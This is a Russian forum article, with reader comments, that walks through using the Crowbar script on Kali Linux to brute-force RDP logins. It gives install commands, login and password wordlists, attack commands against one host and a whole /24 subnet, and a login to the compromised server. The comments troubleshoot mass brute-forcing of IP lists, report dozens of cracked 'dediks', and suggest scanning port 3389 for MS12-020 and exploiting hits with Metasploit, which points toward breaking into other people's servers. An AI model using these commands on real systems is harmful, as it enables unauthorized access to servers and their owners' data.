Статья Обзор скрипта для брутфорса Crowbar в KaliLinux


Я не знаю, потянет ли данная статья на участие в конкурсе, поэтому решение об её участии оставляю за администрацией форума .

Я не планировала писать эту статью.

Её написание пришло спонтанно и фактически явилось "побочным эффектом" от более тесного знакомства со скриптом для брутфорса "Patator".

Так уж сложились обстоятельства, что я не люблю заниматься хакингом на локальной машине. Для этих целей у меня всегда имеется виртуальный выделенный сервер. Обычно мои VDS управляются либо Windows, либо CentOS.

Вчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))

В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )

Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.
Встречайте, Его Величество Crowbar.

Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.

Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.

Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.

Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.
На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.
По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar.
Код:
# apt-get update
Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент :
Код:
# apt-get install freerdp-x11

5wZmJIUzgplv39LItz6cvtk6tD2zlA.png

Проверка работоспособности xfreerdp
Код:
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84
Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить.

Клонируем скрипт Crowbar при помощи git:
Код:
# git clone https://github.com/galkan/crowbar
Заходим в папку со скриптом:
Код:
# cd crowbar
Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться):
Код:
# chmod +x crowbar.py
Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе.
Код:
# python crowbar.py --help

mJUdfPl5Ye3iCwj7yYwDL77r8CdDtS.png

Перед моим взором на экране монитора появилась страница справки по программе.
В этом месте возможно появление следующей ошибки:
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
Код:
# yum -y update
# yum -y install python-pip
# pip install --upgrade pip
Или
Код:
# pip install --upgrade setuptools
# pip install --upgrade distribute
Опять пробуем запустить "Хелп"
Код:
# python crowbar.py --help
Работает ))

На этом - ВСЁ.
Всё коротко и лаконично )
Создаём текстовые файлы с предполагаемым списком логинов
Администратор
Administrator
admin
nimda
а также со списком предполагаемых паролей:
admin
root
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
Запуск скрипта питон в скрипте баш
Атаковать будем мой тестовый дедик IP 185.1хх.13.хх
Команда для атаки в моём случае должна иметь следующий вид:
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
Сканирование подсети 185.1хх.13.хх/24
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
Короткие пояснения :
-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.
Подключаемся к его удалённому рабочему столу.
Код:
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх

bydpYk97dxhlDsJPp0cTsx00kDM33o.png

Успех )

В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта


На этом у меня всё.
Всем - спасибо )
 
Последнее редактирование модератором:

mrOkey

Well-known member
14.11.2017
967
975
BIT
0
Спасибо за статью, один вопрос - зачем так усиленно прятать тестовый ip за звёздами, а потом показывать его на скрине?)
недосып?)
 
Е

Евгений36

Вроде все работает , но есть одно но, в Good на одном ip с брутил 35 дедиков у всех разные пароли и логины и не один не подходит , дедик выдает не правильный пароль или логин , в чем может быть проблема ?
 
V

Valkiria

Проблема лишь в том, что на форуме нет ни одного экстрасенса.
Если хочешь получить реальный совет, потрудись обрисовать ситуацию подробнее, приложить логи, скриншоты.
 
  • Нравится
Реакции: nikos
Е

Евгений36

вот файл Good
[doublepost=1511359331,1511308644][/doublepost]
Проблема лишь в том, что на форуме нет ни одного экстрасенса.
Если хочешь получить реальный совет, потрудись обрисовать ситуацию подробнее, приложить логи, скриншоты.
А я думал люди с такими возможностями которые изобрели этот скрипт , они есть как экстрасенсы .
 

Вложения

  • good.txt
    20 КБ · Просмотры: 526

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Именно этот скрипт был использован при прохождении пентестит лабы при бруте рдп, а гидра имея такой же словарь не справилась с работой.
Спасибо за статью.
 
C

Cepa

Как я понимаю, просто по списку ip адресов данный скрипт не работает?
 
C

Cepa

ввожу команду :
python crowbar.py -b rdp -U /root/login.txt -C /root/pass.txt -S /root/ip3389.txt -o good3389.txt -n 100 -t 500 -v
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>

Как я понимаю список ip в таком формате:
193.1.1.123
193.1.1.124
193.1.1.125

скрипт не распознает?
 
G

Galaktik

ввожу команду :
python crowbar.py -b rdp -U /root/login.txt -C /root/pass.txt -S /root/ip3389.txt -o good3389.txt -n 100 -t 500 -v
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>

Как я понимаю список ip в таком формате:
193.1.1.123
193.1.1.124
193.1.1.125

скрипт не распознает?
Я предположу что s маленькая
 
M

MRR

Привет. Помоги разобраться, не сканирует. Логи тоже не пишет. Установил все по порядку, ошибок не было.

root@kali:/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 124.123.133.12/24 -o good.txt -n 100 -t 500 -v -d
2018-01-05 06:43:52 START
2018-01-05 06:43:52 Crowbar v0.3.5-dev
2018-01-05 06:43:52 Brute Force Type: rdp
2018-01-05 06:43:52 Output File: /crowbar/good.txt
2018-01-05 06:43:52 Log File: /crowbar/crowbar.log
2018-01-05 06:43:52 Discover Mode: True
2018-01-05 06:43:52 Verbose Mode: 1
2018-01-05 06:43:52 Debug Mode: False
2018-01-05 06:43:52 Discovery mode - port scanning: 124.123.133.12/24
2018-01-05 06:43:56 STOP
2018-01-05 06:43:56 No results found...
root@kali:/crowbar# ls
crowbar-blackhat-arsenal.md crowbar.py good.txt images lib LICENSE.txt login.txt pass.txt README.md
root@kali:/crowbar#
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Screenshot_15.jpg

вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
 
Последнее редактирование:
S

Shokker1994

Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
друг не до конца понял , что ты имеешь ввиду)) можешь разжевать?))
 
M

MEBIUS

Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
Статью бы от тебя, эх..
 
  • Нравится
Реакции: Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Статью бы от тебя, эх..
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)
 
  • Нравится
Реакции: Cyber Satori, MRR и MEBIUS

woolf1514

Green Team
06.03.2017
181
191
BIT
5
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)

А как метасплоитом пробивать? Нашел я кучу таких уязвимых серверов... Ввожу в msfconsole:

search ms12-020, вижу сканер и эксплоит. Экслоит - ms12_020_maxchannelids. Только вот, насколько я понял, он просто кладет сервер и все. Толку то от этого? Пишет что эксплоит отработан, seems down.
 
  • Нравится
Реакции: MEBIUS
T

Tenderer

Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>
Решение: В конце каждого IP-адреса в списке добавьте /32
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!